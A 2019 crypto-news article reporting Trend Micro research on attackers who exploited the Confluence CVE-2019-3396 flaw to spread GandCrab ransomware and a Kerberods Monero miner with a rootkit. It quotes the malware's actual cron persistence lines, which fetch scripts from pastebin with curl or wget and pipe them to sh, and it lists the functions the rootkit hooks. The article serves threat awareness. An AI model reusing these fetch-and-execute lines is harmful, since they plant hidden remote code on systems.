Hackers Exploit Confluence Vulnerability to Plant Crypto Mining Malware

As bitcoin (BTC) and other digital assets keep growing in value and use case, cyberpunks are also upping their game with each passing day, formulating new ways of enriching themselves with ‘dirty crypto.’ In the latest scenario, hackers have found a way to seed cryptojacking malware, as well as other dangerous ransomware via a vulnerability in the Confluence software, according to a Trend Micro report on May 7, 2019.

Confluence Exploited

As stated in the Trend Micro report, earlier in March 2019, Atlassian the creators of Confluence, an enterprise-grade collaboration software written in the Java programming language, published an advisory report on two critical security loopholes in the Confluence program: the WebDAV and Widget connector vulnerabilities.

At the time, Atlassian made it clear to users that threat actors could take advantage of the security hole to “remotely exploit a Server-Side Request Forgery (SSRF) vulnerability in the WebDAV plugin to send arbitrary HTTP and WebDAV requests from a Confluence Server or Data Center instance.”

For the uninitiated, a Collaborative software or groupware is an application software developed to help people involved in a common task to get their work done seamlessly.

Though the Atlassian team claim to have fixed the bug in March by releasing the Confluence Server and Data Center versions 6.15.1,  6.6.12, 6.12.3, 6.13.3 and 6.14.2 respectively, Trend Micro has revealed that hackers are still exploiting the vulnerability to seed the Gandcrab ransomware.

According to Alert Logic, hackers have been able to deploy an exploit code for the CVE-2019-3396 vulnerability, using the malicious code to inject Gandcrab ransomware on the victim’s computer through the combination of PowerShell as well as other powerful tools to avoid detection.  

“Unauthenticated remote execution attacks are the golden goose for malicious actors as it allows them to rapidly gain complete control over the victim host. It also allows the most effective platform for persistence and future lateral movement,” declared Alert Logic.

For those who are unaware, PowerShell is an open-source task automation and configuration management framework from Microsoft, which functions just like the Command Prompt in Windows operating systems.

However, PowerShell is far more powerful than the Command Prompt, as it enables the user to have more control over the Windows OS.

Crypto Mining Malware Injected

Sadly, the Trend Micro team has also revealed that in addition to deploying the deadly Gandcrab ransomware on the victim host, threat actors have found other ways to exploit the vulnerability and inject a crypto mining malware embedded with a rootkit designed to function in an invisible way.

The team says the recent attack is similar to the one conducted in November 2018, when the Coinminer.Linux.KORKERDS.AB cryptocurrency-mining malware was embedded with the Rootkit.Linux.KORKEDS.AA component to enable it to mine for cryptos on Linux systems without being fished out by security tools.

With the deadly malware neatly planted into a victim’s computer, the system would start exhibiting performance issues, as the miner tends to use up a large chunk of the system’s processing power.

Even in its invincible mode, the cryptocurrency-mining malware keeps updating and upgrading itself, as well as the necessary configuration files, making it stronger as time goes on.

Since the permission model that comes with Unix-based operating systems such as Linux make it harder to run executable programs with privileges, the researchers have concluded that the cryptocurrency mining malware may have gotten into the Linux system through infected third-party applications that were granted admin rights.

“Malware can run with privileges granted to compromised applications. It’s not an uncommon vector, as other Linux cryptocurrency-mining malware tools have used this as an entry point,” said the researchers.

As depicted in the image above, the hacker first sends a remote command via the infected third-party software, to download a shell script from pastebin (hxxps://pastebin[.]com/MjGrx7EA).

The shell script terminates certain system processes and goes ahead to download and execute “lsd_1 from another pastebin (hxxps://pastebin[.]com/CvJM3qz5).  

The Kerberods malware, which is responsible for injecting the Coinminer.Linux.MALXMR.UWEJI cryptocurrency miner (khugepageds) and its rootkit component in the host, is a custom-packed binary that quietly installs itself through cron jobs:

• */10****curl -fsSL hxxps://pastebin[.]com/raw/60T3uCcb|sh
• */15****wget -q -O- hxxps://pastebin[.]com/raw/60T3uCcb|sh
• */15****root wget -q -O- hxxps://pastebin[].com/raw/60T3uCcb|sh
• */15****(curl -fsSL hxxps://pastebin[.]com/raw/rPB8eDpu||wge -q – O-hxxps://pastebin[.]com/raw/rPB8eDpu)|sh

Cron is simply a Linux utility whose primary duty is to schedule a command or script on the server, to be run automatically at a later time and date, while a Cron job, on the other hand, is the specific task scheduled to be executed.

Khugepageds is an XMRig 2.14.1 -mo1 Monero (XMR) miner.

Rootkit Hides it All

Reportedly, while the latest crypto-mining attack shares several characteristics with last year’s incident, such as the “use of pastebin as a C&C server, as well as the use of a rootkit to conceal the cryptocurrency mining malware, it slightly differentiates itself from the older version by hooking more functions.

This crazy maneuver enables it to completely hide the mining activity, certain files, and network traffic, while also forging the machine’s CPU usage.

Some of the hooked functions include:

• fopen
• fopen64
• lstat
• lxstat  
• open
• rmdir
• stat
• stat64
• _xstat
• _xstat64
• unlink
• unlinkat and others

“Most of the hooked functions would return a “No such file or directory error” if their parameter contains the file name of the rootkit, the miner, or Id.so.preload,” said the researchers.

It’s worth noting that most cryptocurrency mining malware is configured to mint Monero (XMR) since the altcoin is privacy-centric and easier to mine than bitcoin (BTC).

Earlier in February 2019, BTCManager reported that a Romanian hacker group with the moniker, Outlaw, had infected numerous Linux and Internet of Things (IoT) systems with an upgraded and modified version of the trojan Shellbot, in a bid to mine Monero (XMR).

Mitigating the Threat

The researchers have advised organizations to continually monitor their network environments in order to quickly detect any unusual system behavior, while also making efforts to install the latest security software.

Trend Micro also recommends its Hybrid Cloud Security solution, which its claims “provides powerful, streamlined, and automated security within the DevOps pipeline.”